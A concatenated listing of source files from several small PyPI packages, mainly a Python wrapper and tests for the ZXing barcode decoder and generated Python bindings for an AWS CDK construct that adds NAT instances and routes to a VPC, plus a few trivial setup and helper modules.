code | package | path | filename
---|---|---|---|
__version__="0.19"
|
zxingmod
|
/zxingmod-0.19.tar.gz/zxingmod-0.19/zxing/version.py
|
version.py
|
########################################################################
#
# zxing.py -- a quick and dirty wrapper for zxing for python
#
# this allows you to send images and get back data from the ZXing
# library: http://code.google.com/p/zxing/
#
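#
# A minimal usage sketch (assumes a working `java` binary and the bundled
# ZXing JARs are available; 'barcode.png' is a hypothetical image path):
#
#     from zxing import BarCodeReader
#     reader = BarCodeReader()
#     result = reader.decode('barcode.png', try_harder=True)
#     if result is not None:
#         print(result.format, result.parsed)
#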
from __future__ import print_function
from urllib.parse import quote
from enum import Enum
import pathlib
import zipfile
from .version import __version__
import subprocess as sp, re, os
class BarCodeReaderException(Exception):
def __init__(self, message, filename=None, underlying=None):
self.message, self.filename, self.underlying = message, filename, underlying
super().__init__(message, filename, underlying)
class BarCodeReader(object):
cls = "com.google.zxing.client.j2se.CommandLineRunner"
def __init__(self, classpath=None, java=None):
self.java = java or 'java'
self.zxing_version = self.zxing_version_info = None
if classpath:
self.classpath = classpath if isinstance(classpath, str) else ':'.join(classpath)
elif "ZXING_CLASSPATH" in os.environ:
self.classpath = os.environ.get("ZXING_CLASSPATH","")
else:
self.classpath = os.path.join(os.path.dirname(__file__), 'java', '*')
with zipfile.ZipFile(os.path.join(os.path.dirname(__file__), 'java', 'core.jar')) as c:
for line in c.open('META-INF/MANIFEST.MF'):
if line.startswith(b'Bundle-Version: '):
self.zxing_version = line.split(b' ', 1)[1].strip().decode()
self.zxing_version_info = tuple(int(n) for n in self.zxing_version.split('.'))
break
def decode(self, filenames, try_harder=False, possible_formats=None, pure_barcode=False, products_only=False):
possible_formats = (possible_formats,) if isinstance(possible_formats, str) else possible_formats
if isinstance(filenames, str):
one_file = True
filenames = filenames,
else:
one_file = False
file_uris = [ pathlib.Path(f).absolute().as_uri() for f in filenames ]
cmd = [self.java, '-cp', self.classpath, self.cls] + file_uris
if try_harder:
cmd.append('--try_harder')
if pure_barcode:
cmd.append('--pure_barcode')
if products_only:
cmd.append('--products_only')
if possible_formats:
for pf in possible_formats:
cmd += ['--possible_formats', pf ]
try:
p = sp.Popen(cmd, stdout=sp.PIPE, stderr=sp.STDOUT, universal_newlines=False)
except FileNotFoundError as e:
raise BarCodeReaderException("Java binary specified (%s) does not exist" % self.java, self.java, e)
except PermissionError as e:
raise BarCodeReaderException("Java binary specified (%s) is not executable" % self.java, self.java, e)
stdout, stderr = p.communicate()
if stdout.startswith((b'Error: Could not find or load main class com.google.zxing.client.j2se.CommandLineRunner',
b'Exception in thread "main" java.lang.NoClassDefFoundError:')):
raise BarCodeReaderException("Java JARs not found in classpath (%s)" % self.classpath, self.classpath)
elif stdout.startswith((b'''Exception in thread "main" javax.imageio.IIOException: Can't get input stream from URL!''',
b'''Exception in thread "main" java.util.concurrent.ExecutionException: javax.imageio.IIOException: Can't get input stream from URL!''')):
raise BarCodeReaderException("Could not find image path: %s" % filenames, filenames)
elif stdout.startswith(b'''Exception in thread "main" java.io.IOException: Could not load '''):
raise BarCodeReaderException("Java library could not read image; is it in a supported format?", filenames)
elif stdout.startswith(b'''Exception '''):
raise BarCodeReaderException("Unknown Java exception: %s" % stdout)
elif p.returncode:
raise BarCodeReaderException("Unexpected Java subprocess return code %d" % p.returncode, self.java)
if p.returncode:
codes = [ None for fn in filenames ]
else:
file_results = []
for line in stdout.splitlines(True):
if line.startswith((b'file:///',b'Exception')):
file_results.append(line)
else:
file_results[-1] += line
codes = [ BarCode.parse(result) for result in file_results ]
if one_file:
return codes[0]
else:
# zxing (insanely) randomly reorders the output blocks, so we have to put them back in the
# expected order, based on their URIs
d = {c.uri: c for c in codes if c is not None} # there can be None in codes
return [d[f] if f in d else None for f in file_uris]
class CLROutputBlock(Enum):
UNKNOWN = 0
RAW = 1
PARSED = 2
POINTS = 3
class BarCode(object):
@classmethod
def parse(cls, zxing_output):
block = CLROutputBlock.UNKNOWN
uri = format = type = None
raw = parsed = b''
points = []
for l in zxing_output.splitlines(True):
if block==CLROutputBlock.UNKNOWN:
if l.endswith(b': No barcode found\n'):
return None
m = re.match(rb"(\S+) \(format:\s*([^,]+),\s*type:\s*([^)]+)\)", l)
if m:
uri, format, type = m.group(1).decode(), m.group(2).decode(), m.group(3).decode()
elif l.startswith(b"Raw result:"):
block = CLROutputBlock.RAW
elif block==CLROutputBlock.RAW:
if l.startswith(b"Parsed result:"):
block = CLROutputBlock.PARSED
else:
raw += l
elif block==CLROutputBlock.PARSED:
if re.match(rb"Found\s+\d+\s+result\s+points?", l):
block = CLROutputBlock.POINTS
else:
parsed += l
elif block==CLROutputBlock.POINTS:
m = re.match(rb"\s*Point\s*\d+:\s*\(([\d.]+),([\d.]+)\)", l)
if m:
points.append((float(m.group(1)), float(m.group(2))))
raw = raw[:-1].decode()
parsed = parsed[:-1].decode()
return cls(uri, format, type, raw, parsed, points)
def __init__(self, uri, format, type, raw, parsed, points):
self.raw = raw
self.parsed = parsed
self.uri = uri
self.format = format
self.type = type
self.points = points
def __repr__(self):
return '{}(raw={!r}, parsed={!r}, uri={!r}, format={!r}, type={!r}, points={!r})'.format(
self.__class__.__name__, self.raw, self.parsed, self.uri, self.format, self.type, self.points)
|
zxingmod
|
/zxingmod-0.19.tar.gz/zxingmod-0.19/zxing/__init__.py
|
__init__.py
|
import logging
import zxing
from tempfile import mkdtemp
import os
from nose import with_setup
from nose.tools import raises
test_barcode_dir = os.path.join(os.path.dirname(__file__), 'barcodes')
test_barcodes = [
( 'QR_CODE-easy.png', 'QR_CODE', 'This should be QR_CODE', ),
( 'CODE_128-easy.jpg', 'CODE_128', 'This should be CODE_128', ),
( 'PDF_417-easy.bmp', 'PDF_417', 'This should be PDF_417', ),
( 'AZTEC-easy.jpg', 'AZTEC', 'This should be AZTEC' ),
( 'QR CODE (¡filenáme törture test! 😉).png', 'QR_CODE', 'This should be QR_CODE' ),
( 'QR_CODE-png-but-wrong-extension.bmp', 'QR_CODE', 'This should be QR_CODE' ),
( 'QR_CODE-fun-with-whitespace.png', 'QR_CODE', '\n\r\t\r\r\r\n ' ),
( 'QR_CODE-screen_scraping_torture_test.png', 'QR_CODE',
'\n\\n¡Atención ☹! UTF-8 characters,\n\r embedded newlines,\r &&am&p;& trailing whitespace\t \r ' ),
]
test_reader = None
def setup_reader():
global test_reader
if test_reader is None:
test_reader = zxing.BarCodeReader()
@with_setup(setup_reader)
def test_version():
global test_reader
assert test_reader.zxing_version is not None
assert '.'.join(map(str, test_reader.zxing_version_info)) == test_reader.zxing_version
@with_setup(setup_reader)
def _check_decoding(filename, expected_format, expected_raw, extra={}):
global test_reader
path = os.path.join(test_barcode_dir, filename)
logging.debug('Trying to parse {}, expecting {!r}.'.format(path, expected_raw))
dec = test_reader.decode(path, pure_barcode=True, **extra)
if expected_raw is None:
if dec is not None:
raise AssertionError('Expected failure, but got a result in {} format'.format(dec.format))
else:
if dec.raw != expected_raw:
raise AssertionError('Expected {!r} but got {!r}'.format(expected_raw, dec.raw))
if dec.format != expected_format:
raise AssertionError('Expected {!r} but got {!r}'.format(expected_format, dec.format))
def test_decoding():
global test_reader
yield from ((_check_decoding, filename, expected_format, expected_raw) for filename, expected_format, expected_raw in test_barcodes)
def test_possible_formats():
yield from ((_check_decoding, filename, expected_format, expected_raw, dict(possible_formats=('CODE_93', expected_format, 'DATA_MATRIX')))
for filename, expected_format, expected_raw in test_barcodes)
@with_setup(setup_reader)
def test_decoding_multiple():
reader = zxing.BarCodeReader()
filenames = [os.path.join(test_barcode_dir, filename) for filename, expected_format, expected_raw in test_barcodes]
for dec, (filename, expected_format, expected_raw) in zip(reader.decode(filenames, pure_barcode=True), test_barcodes):
if dec.raw != expected_raw:
raise AssertionError('{}: Expected {!r} but got {!r}'.format(filename, expected_raw, dec.raw))
if dec.format != expected_format:
raise AssertionError('{}: Expected {!r} but got {!r}'.format(filename, expected_format, dec.format))
def test_parsing():
dec = zxing.BarCode.parse("""
file:///tmp/default.png (format: FAKE_DATA, type: TEXT):
Raw result:
Élan|\tthe barcode is taking off
Parsed result:
Élan
\tthe barcode is taking off
Found 4 result points:
Point 0: (24.0,18.0)
Point 1: (21.0,196.0)
Point 2: (201.0,198.0)
Point 3: (205.23952,21.0)
""".encode())
assert dec.uri == 'file:///tmp/default.png'
assert dec.format == 'FAKE_DATA'
assert dec.type == 'TEXT'
assert dec.raw == 'Élan|\tthe barcode is taking off'
assert dec.parsed == 'Élan\n\tthe barcode is taking off'
assert dec.points == [(24.0,18.0),(21.0,196.0),(201.0,198.0),(205.23952,21.0)]
def test_wrong_formats():
all_test_formats = {fmt for fn,fmt,raw in test_barcodes}
yield from ((_check_decoding, filename, expected_format, None, dict(possible_formats=all_test_formats - {expected_format}))
for filename, expected_format, expected_raw in test_barcodes)
@raises(zxing.BarCodeReaderException)
def test_bad_java():
test_reader = zxing.BarCodeReader(java=os.devnull)
test_reader.decode(test_barcodes[0][0])
@raises(zxing.BarCodeReaderException)
def test_bad_classpath():
test_reader = zxing.BarCodeReader(classpath=mkdtemp())
test_reader.decode(test_barcodes[0][0])
@raises(zxing.BarCodeReaderException)
@with_setup(setup_reader)
def test_nonexistent_file_error():
global test_reader
test_reader.decode(os.path.join(test_barcode_dir, 'nonexistent.png'))
@raises(zxing.BarCodeReaderException)
@with_setup(setup_reader)
def test_bad_file_format_error():
global test_reader
test_reader.decode(os.path.join(test_barcode_dir, 'bad_format.png'))
|
zxingmod
|
/zxingmod-0.19.tar.gz/zxingmod-0.19/test/test_all.py
|
test_all.py
|
===========
zxinvoice
===========
|
zxinvoice
|
/zxinvoice-1.0.2.tar.gz/zxinvoice-1.0.2/README.rst
|
README.rst
|
from setuptools import *
# from distutils.core import setup
def readme():
with open('README.md', encoding='utf-8') as f:
content = f.read()
return content
setup(
name='zxinvoice', # package name
version='1.0.2', # version
author='Jason', # author
author_email='jason@rimeix.com', # author email
description='This is for managing invoice', # description
long_description=readme(), # long description
long_description_content_type='text/markdown', # long description content type
keywords='zxinvoice', # keywords
# url='', # project homepage
classifiers=[],
# license='Apache License 2.0', # license
packages=find_packages('src'),
install_requires=[
'chinesecalendar',
'baidu-aip',
'chardet',
'pywebio',
'pysqlcipher3',
],
python_requires='>=3.6',
# entry_points={
# 'console_scripts': [
# 'zxinvoice = zxinvoice.main:main' # format: 'command = module:function'
# ]
# }
)
|
zxinvoice
|
/zxinvoice-1.0.2.tar.gz/zxinvoice-1.0.2/setup.py
|
setup.py
|
'''
# Simple NAT

[npm](https://www.npmjs.com/package/cdk-construct-simple-nat)
[PyPI](https://pypi.org/project/zxkane.cdk-construct-simple-nat/)

It's a CDK construct to create NAT instances on AWS.
It supports adding specific IP CIDRs to the route tables of a VPC, so that network traffic to those IP CIDRs is forwarded to the NAT instances.
Out of the box, it supports routing to the following services:
* Github git servers
* Google
* Cloudflare

## Install
TypeScript/JavaScript:
```shell
yarn add cdk-construct-simple-nat
```
or
```shell
npm install cdk-construct-simple-nat
```
## Usage
```python
import { SimpleNAT } from 'cdk-construct-simple-nat';
new SimpleNAT(this, 'SimpleNAT', {
vpc,
natSubnetsSelection: {
subnetType: SubnetType.PUBLIC,
onePerAz: true,
},
})
.withGithubRoute();
```
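For Python users of this package, a rough equivalent of the snippet above using the generated `zxkane.cdk_construct_simple_nat` bindings might look like the following sketch (the stack and VPC here are hypothetical placeholders):
```python
from aws_cdk import Stack
from aws_cdk import aws_ec2 as ec2
from constructs import Construct
from zxkane.cdk_construct_simple_nat import SimpleNAT

class NatStack(Stack):
    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)
        vpc = ec2.Vpc(self, 'Vpc')  # or look up an existing VPC
        SimpleNAT(
            self, 'SimpleNAT',
            vpc=vpc,
            nat_subnets_selection=ec2.SubnetSelection(
                subnet_type=ec2.SubnetType.PUBLIC,
                one_per_az=True,
            ),
        ).with_github_route()
```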
See the complete [example](example/) and [API doc](./API.md).
## FAQ
### What's the difference between [EC2 NAT instances](https://docs.aws.amazon.com/cdk/api/latest/docs/aws-ec2-readme.html#using-nat-instances) and NAT instances created by this construct
The differences are as follows:
* An EC2 NAT instance will route all Internet traffic to itself by default
* The EC2 NAT instance uses the deprecated Amazon Linux AMI, while this construct always uses the latest Amazon Linux 2 AMI
* NAT instances created by this construct can work together with NAT gateways, so you can have multiple NAT instances in one VPC
* This construct helps when you only want to route specific traffic (for example, github/gist) to NAT instances acting as a transit proxy
### What's the difference between [CDK built-in NAT instances](https://docs.aws.amazon.com/cdk/api/latest/docs/aws-ec2-readme.html#using-nat-instances) and NAT instances created by this construct
* CDK built-in NAT instances have to be created together with the VPC stack, while this construct can add NAT instances to any existing VPC
* You can use this construct to create multiple NAT instances for different purposes
* This construct lets you customize how the instances route the traffic
### The deployment fails because the routes in the route table exceed the limit
[The default limit is 50 routes per route table](https://docs.aws.amazon.com/vpc/latest/userguide/amazon-vpc-limits.html#vpc-limits-route-tables), so the deployment will fail if it adds more routes than your account's limit allows.
You can increase the limit up to **1000** routes per route table via a service quota request.
### How to exclude IPv6 CIDR with built-in github/google/cloudflare routes
You can exclude IPv6 CIDRs as shown below:
```python
new SimpleNAT(this, 'SimpleNAT', {
vpc,
})
.withCloudflareRoute({
excludeIPv6: true,
});
```
'''
import abc
import builtins
import datetime
import enum
import typing
import jsii
import publication
import typing_extensions
from typeguard import check_type
from ._jsii import *
import aws_cdk as _aws_cdk_ceddda9d
import aws_cdk.aws_ec2 as _aws_cdk_aws_ec2_ceddda9d
import aws_cdk.aws_iam as _aws_cdk_aws_iam_ceddda9d
import constructs as _constructs_77d1e7e8
@jsii.data_type(
jsii_type="cdk-construct-simple-nat.RouteProps",
jsii_struct_bases=[],
name_mapping={"exclude_i_pv6": "excludeIPv6"},
)
class RouteProps:
def __init__(self, *, exclude_i_pv6: typing.Optional[builtins.bool] = None) -> None:
'''Properties for how IPs are added to route tables.
:param exclude_i_pv6: If excluding IPv6 when creating route. Default: - false
'''
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__4d34548d22997ef5a79c5e9d6f568bc469b4cd6258c1f2ceb04fc1b6982a08d8)
check_type(argname="argument exclude_i_pv6", value=exclude_i_pv6, expected_type=type_hints["exclude_i_pv6"])
self._values: typing.Dict[builtins.str, typing.Any] = {}
if exclude_i_pv6 is not None:
self._values["exclude_i_pv6"] = exclude_i_pv6
@builtins.property
def exclude_i_pv6(self) -> typing.Optional[builtins.bool]:
'''If excluding IPv6 when creating route.
:default: - false
'''
result = self._values.get("exclude_i_pv6")
return typing.cast(typing.Optional[builtins.bool], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "RouteProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
class SimpleNAT(
_aws_cdk_ceddda9d.Resource,
metaclass=jsii.JSIIMeta,
jsii_type="cdk-construct-simple-nat.SimpleNAT",
):
'''Simple NAT instances construct.'''
def __init__(
self,
scope: _constructs_77d1e7e8.Construct,
id: builtins.str,
*,
vpc: _aws_cdk_aws_ec2_ceddda9d.IVpc,
custom_scripts: typing.Optional[builtins.str] = None,
instance_type: typing.Optional[_aws_cdk_aws_ec2_ceddda9d.InstanceType] = None,
key_name: typing.Optional[builtins.str] = None,
machine_image: typing.Optional[_aws_cdk_aws_ec2_ceddda9d.IMachineImage] = None,
nat_subnets_selection: typing.Optional[typing.Union[_aws_cdk_aws_ec2_ceddda9d.SubnetSelection, typing.Dict[builtins.str, typing.Any]]] = None,
private_subnets_selection: typing.Optional[typing.Union[_aws_cdk_aws_ec2_ceddda9d.SubnetSelection, typing.Dict[builtins.str, typing.Any]]] = None,
role: typing.Optional[_aws_cdk_aws_iam_ceddda9d.IRole] = None,
) -> None:
'''
:param scope: -
:param id: -
:param vpc: The VPC the NAT instances will reside.
:param custom_scripts: The custom script when provisioning the NAT instances. Default: - no custom script.
:param instance_type: The instance type of NAT instances. Default: - t3.MICRO.
:param key_name: The key name of ssh key of NAT instances. Default: - No SSH access will be possible.
:param machine_image: The AMI of NAT instances. Default: - Amazon Linux 2 for x86_64.
:param nat_subnets_selection: The subnet selection for NAT instances, one NAT instance will be placed in the selected subnets. NOTE: must select the public subnet Default: - subnetType is SubnetType.PUBLIC and onePerAZ is true.
:param private_subnets_selection: The subnet selection for updating route tables for selected subnets. Default: - subnetType is SubnetType.PRIVATE_WITH_NAT.
:param role: The IAM role attached to NAT instances. Default: - an IAM role is created.
'''
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__197af24f4f5730f96fa183c445a232b5186626045f427ebb5867ad1d8c7e09da)
check_type(argname="argument scope", value=scope, expected_type=type_hints["scope"])
check_type(argname="argument id", value=id, expected_type=type_hints["id"])
props = SimpleNATProps(
vpc=vpc,
custom_scripts=custom_scripts,
instance_type=instance_type,
key_name=key_name,
machine_image=machine_image,
nat_subnets_selection=nat_subnets_selection,
private_subnets_selection=private_subnets_selection,
role=role,
)
jsii.create(self.__class__, self, [scope, id, props])
@jsii.member(jsii_name="addV4Route")
def add_v4_route(self, v4_cidr: builtins.str) -> "SimpleNAT":
'''
:param v4_cidr: -
'''
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__c1c06f12fb3f5aa03c07a8dcbe1253103ac4995ab0bfa1a628dabf2fd78d682e)
check_type(argname="argument v4_cidr", value=v4_cidr, expected_type=type_hints["v4_cidr"])
return typing.cast("SimpleNAT", jsii.invoke(self, "addV4Route", [v4_cidr]))
@jsii.member(jsii_name="addV6Route")
def add_v6_route(self, v6_cidr: builtins.str) -> "SimpleNAT":
'''
:param v6_cidr: -
'''
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__93261506b573bb0ec3744c03025737a256877686f97d9d1c0ce75e2181794949)
check_type(argname="argument v6_cidr", value=v6_cidr, expected_type=type_hints["v6_cidr"])
return typing.cast("SimpleNAT", jsii.invoke(self, "addV6Route", [v6_cidr]))
@jsii.member(jsii_name="withCloudflareRoute")
def with_cloudflare_route(
self,
*,
exclude_i_pv6: typing.Optional[builtins.bool] = None,
) -> "SimpleNAT":
'''Add Cloudflare IPs to route table.
See https://www.cloudflare.com/ips/ for details
:param exclude_i_pv6: If excluding IPv6 when creating route. Default: - false
'''
props = RouteProps(exclude_i_pv6=exclude_i_pv6)
return typing.cast("SimpleNAT", jsii.invoke(self, "withCloudflareRoute", [props]))
@jsii.member(jsii_name="withGithubRoute")
def with_github_route(
self,
*,
exclude_i_pv6: typing.Optional[builtins.bool] = None,
) -> "SimpleNAT":
'''Add Github IPs to route table.
:param exclude_i_pv6: If excluding IPv6 when creating route. Default: - false
'''
props = RouteProps(exclude_i_pv6=exclude_i_pv6)
return typing.cast("SimpleNAT", jsii.invoke(self, "withGithubRoute", [props]))
@jsii.member(jsii_name="withGoogleRoute")
def with_google_route(
self,
*,
exclude_i_pv6: typing.Optional[builtins.bool] = None,
) -> "SimpleNAT":
'''Add Google IPs to route table.
:param exclude_i_pv6: If excluding IPv6 when creating route. Default: - false
'''
props = RouteProps(exclude_i_pv6=exclude_i_pv6)
return typing.cast("SimpleNAT", jsii.invoke(self, "withGoogleRoute", [props]))
@jsii.python.classproperty
@jsii.member(jsii_name="Ipv6Regex")
def IPV6_REGEX(cls) -> builtins.str:
return typing.cast(builtins.str, jsii.sget(cls, "Ipv6Regex"))
@jsii.data_type(
jsii_type="cdk-construct-simple-nat.SimpleNATProps",
jsii_struct_bases=[],
name_mapping={
"vpc": "vpc",
"custom_scripts": "customScripts",
"instance_type": "instanceType",
"key_name": "keyName",
"machine_image": "machineImage",
"nat_subnets_selection": "natSubnetsSelection",
"private_subnets_selection": "privateSubnetsSelection",
"role": "role",
},
)
class SimpleNATProps:
def __init__(
self,
*,
vpc: _aws_cdk_aws_ec2_ceddda9d.IVpc,
custom_scripts: typing.Optional[builtins.str] = None,
instance_type: typing.Optional[_aws_cdk_aws_ec2_ceddda9d.InstanceType] = None,
key_name: typing.Optional[builtins.str] = None,
machine_image: typing.Optional[_aws_cdk_aws_ec2_ceddda9d.IMachineImage] = None,
nat_subnets_selection: typing.Optional[typing.Union[_aws_cdk_aws_ec2_ceddda9d.SubnetSelection, typing.Dict[builtins.str, typing.Any]]] = None,
private_subnets_selection: typing.Optional[typing.Union[_aws_cdk_aws_ec2_ceddda9d.SubnetSelection, typing.Dict[builtins.str, typing.Any]]] = None,
role: typing.Optional[_aws_cdk_aws_iam_ceddda9d.IRole] = None,
) -> None:
'''Properties for NAT instances.
:param vpc: The VPC the NAT instances will reside.
:param custom_scripts: The custom script when provisioning the NAT instances. Default: - no custom script.
:param instance_type: The instance type of NAT instances. Default: - t3.MICRO.
:param key_name: The key name of ssh key of NAT instances. Default: - No SSH access will be possible.
:param machine_image: The AMI of NAT instances. Default: - Amazon Linux 2 for x86_64.
:param nat_subnets_selection: The subnet selection for NAT instances, one NAT instance will be placed in the selected subnets. NOTE: must select the public subnet Default: - subnetType is SubnetType.PUBLIC and onePerAZ is true.
:param private_subnets_selection: The subnet selection for updating route tables for selected subnets. Default: - subnetType is SubnetType.PRIVATE_WITH_NAT.
:param role: The IAM role attached to NAT instances. Default: - an IAM role is created.
'''
if isinstance(nat_subnets_selection, dict):
nat_subnets_selection = _aws_cdk_aws_ec2_ceddda9d.SubnetSelection(**nat_subnets_selection)
if isinstance(private_subnets_selection, dict):
private_subnets_selection = _aws_cdk_aws_ec2_ceddda9d.SubnetSelection(**private_subnets_selection)
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__cb36a69875376bdd591a68534a6ce401cf1725004ca106be48dca435ff5b574c)
check_type(argname="argument vpc", value=vpc, expected_type=type_hints["vpc"])
check_type(argname="argument custom_scripts", value=custom_scripts, expected_type=type_hints["custom_scripts"])
check_type(argname="argument instance_type", value=instance_type, expected_type=type_hints["instance_type"])
check_type(argname="argument key_name", value=key_name, expected_type=type_hints["key_name"])
check_type(argname="argument machine_image", value=machine_image, expected_type=type_hints["machine_image"])
check_type(argname="argument nat_subnets_selection", value=nat_subnets_selection, expected_type=type_hints["nat_subnets_selection"])
check_type(argname="argument private_subnets_selection", value=private_subnets_selection, expected_type=type_hints["private_subnets_selection"])
check_type(argname="argument role", value=role, expected_type=type_hints["role"])
self._values: typing.Dict[builtins.str, typing.Any] = {
"vpc": vpc,
}
if custom_scripts is not None:
self._values["custom_scripts"] = custom_scripts
if instance_type is not None:
self._values["instance_type"] = instance_type
if key_name is not None:
self._values["key_name"] = key_name
if machine_image is not None:
self._values["machine_image"] = machine_image
if nat_subnets_selection is not None:
self._values["nat_subnets_selection"] = nat_subnets_selection
if private_subnets_selection is not None:
self._values["private_subnets_selection"] = private_subnets_selection
if role is not None:
self._values["role"] = role
@builtins.property
def vpc(self) -> _aws_cdk_aws_ec2_ceddda9d.IVpc:
'''The VPC the NAT instances will reside.'''
result = self._values.get("vpc")
assert result is not None, "Required property 'vpc' is missing"
return typing.cast(_aws_cdk_aws_ec2_ceddda9d.IVpc, result)
@builtins.property
def custom_scripts(self) -> typing.Optional[builtins.str]:
'''The custom script when provisioning the NAT instances.
:default: - no custom script.
'''
result = self._values.get("custom_scripts")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def instance_type(self) -> typing.Optional[_aws_cdk_aws_ec2_ceddda9d.InstanceType]:
'''The instance type of NAT instances.
:default: - t3.MICRO.
'''
result = self._values.get("instance_type")
return typing.cast(typing.Optional[_aws_cdk_aws_ec2_ceddda9d.InstanceType], result)
@builtins.property
def key_name(self) -> typing.Optional[builtins.str]:
'''The key name of ssh key of NAT instances.
:default: - No SSH access will be possible.
'''
result = self._values.get("key_name")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def machine_image(self) -> typing.Optional[_aws_cdk_aws_ec2_ceddda9d.IMachineImage]:
'''The AMI of NAT instances.
:default: - Amazon Linux 2 for x86_64.
'''
result = self._values.get("machine_image")
return typing.cast(typing.Optional[_aws_cdk_aws_ec2_ceddda9d.IMachineImage], result)
@builtins.property
def nat_subnets_selection(
self,
) -> typing.Optional[_aws_cdk_aws_ec2_ceddda9d.SubnetSelection]:
'''The subnet selection for NAT instances, one NAT instance will be placed in the selected subnets.
NOTE: must select the public subnet
:default: - subnetType is SubnetType.PUBLIC and onePerAZ is true.
'''
result = self._values.get("nat_subnets_selection")
return typing.cast(typing.Optional[_aws_cdk_aws_ec2_ceddda9d.SubnetSelection], result)
@builtins.property
def private_subnets_selection(
self,
) -> typing.Optional[_aws_cdk_aws_ec2_ceddda9d.SubnetSelection]:
'''The subnet selection for updating route tables for selected subnets.
:default: - subnetType is SubnetType.PRIVATE_WITH_NAT.
'''
result = self._values.get("private_subnets_selection")
return typing.cast(typing.Optional[_aws_cdk_aws_ec2_ceddda9d.SubnetSelection], result)
@builtins.property
def role(self) -> typing.Optional[_aws_cdk_aws_iam_ceddda9d.IRole]:
'''The IAM role attached to NAT instances.
:default: - an IAM role is created.
'''
result = self._values.get("role")
return typing.cast(typing.Optional[_aws_cdk_aws_iam_ceddda9d.IRole], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "SimpleNATProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
__all__ = [
"RouteProps",
"SimpleNAT",
"SimpleNATProps",
]
publication.publish()
def _typecheckingstub__4d34548d22997ef5a79c5e9d6f568bc469b4cd6258c1f2ceb04fc1b6982a08d8(
*,
exclude_i_pv6: typing.Optional[builtins.bool] = None,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__197af24f4f5730f96fa183c445a232b5186626045f427ebb5867ad1d8c7e09da(
scope: _constructs_77d1e7e8.Construct,
id: builtins.str,
*,
vpc: _aws_cdk_aws_ec2_ceddda9d.IVpc,
custom_scripts: typing.Optional[builtins.str] = None,
instance_type: typing.Optional[_aws_cdk_aws_ec2_ceddda9d.InstanceType] = None,
key_name: typing.Optional[builtins.str] = None,
machine_image: typing.Optional[_aws_cdk_aws_ec2_ceddda9d.IMachineImage] = None,
nat_subnets_selection: typing.Optional[typing.Union[_aws_cdk_aws_ec2_ceddda9d.SubnetSelection, typing.Dict[builtins.str, typing.Any]]] = None,
private_subnets_selection: typing.Optional[typing.Union[_aws_cdk_aws_ec2_ceddda9d.SubnetSelection, typing.Dict[builtins.str, typing.Any]]] = None,
role: typing.Optional[_aws_cdk_aws_iam_ceddda9d.IRole] = None,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__c1c06f12fb3f5aa03c07a8dcbe1253103ac4995ab0bfa1a628dabf2fd78d682e(
v4_cidr: builtins.str,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__93261506b573bb0ec3744c03025737a256877686f97d9d1c0ce75e2181794949(
v6_cidr: builtins.str,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__cb36a69875376bdd591a68534a6ce401cf1725004ca106be48dca435ff5b574c(
*,
vpc: _aws_cdk_aws_ec2_ceddda9d.IVpc,
custom_scripts: typing.Optional[builtins.str] = None,
instance_type: typing.Optional[_aws_cdk_aws_ec2_ceddda9d.InstanceType] = None,
key_name: typing.Optional[builtins.str] = None,
machine_image: typing.Optional[_aws_cdk_aws_ec2_ceddda9d.IMachineImage] = None,
nat_subnets_selection: typing.Optional[typing.Union[_aws_cdk_aws_ec2_ceddda9d.SubnetSelection, typing.Dict[builtins.str, typing.Any]]] = None,
private_subnets_selection: typing.Optional[typing.Union[_aws_cdk_aws_ec2_ceddda9d.SubnetSelection, typing.Dict[builtins.str, typing.Any]]] = None,
role: typing.Optional[_aws_cdk_aws_iam_ceddda9d.IRole] = None,
) -> None:
"""Type checking stubs"""
pass
|
zxkane.cdk-construct-simple-nat
|
/zxkane.cdk_construct_simple_nat-0.2.387-py3-none-any.whl/zxkane/cdk_construct_simple_nat/__init__.py
|
__init__.py
|
import abc
import builtins
import datetime
import enum
import typing
import jsii
import publication
import typing_extensions
from typeguard import check_type
import aws_cdk._jsii
import constructs._jsii
__jsii_assembly__ = jsii.JSIIAssembly.load(
"cdk-construct-simple-nat",
"0.2.387",
__name__[0:-6],
"cdk-construct-simple-nat@0.2.387.jsii.tgz",
)
__all__ = [
"__jsii_assembly__",
]
publication.publish()
|
zxkane.cdk-construct-simple-nat
|
/zxkane.cdk_construct_simple_nat-0.2.387-py3-none-any.whl/zxkane/cdk_construct_simple_nat/_jsii/__init__.py
|
__init__.py
|
def love():
print('xm')
|
zxl
|
/zxl-1.0.tar.gz/zxl-1.0/zxl.py
|
zxl.py
|
from setuptools import setup
setup(
name='zxl',
version='v1.0',
description='for love',
py_modules=['zxl'],
author='upuuuuuu',
author_email='2226548059@qq.com',
url='https://github.com/upuuuuuu',
license='MIT'
)
|
zxl
|
/zxl-1.0.tar.gz/zxl-1.0/setup.py
|
setup.py
|
import sys
def execute():
argv = sys.argv
print('cc :::: [ {} ]'.format(' '.join(argv)))
|
zxmtools
|
/zxmtools-0.0.0-py3-none-any.whl/cc/xx.py
|
xx.py
|
# -*- coding: utf-8 -*-
"""
-------------------------------------------------
File Name: zxpath.py
Author : Zhang Fan
date: 18/10/12
Description :
-------------------------------------------------
"""
__author__ = 'Zhang Fan'
from lxml import etree
class _base_library:
@staticmethod
def get_once(result, default=None):
if result:
return result[0]
return default
# region raw xpath query helpers
@staticmethod
def xpath_once(node, code, default=None):
return _base_library.get_once(node.xpath('{}[1]'.format(code)), default=default)
@staticmethod
def xpath_all(node, code):
return node.xpath(code)
# endregion
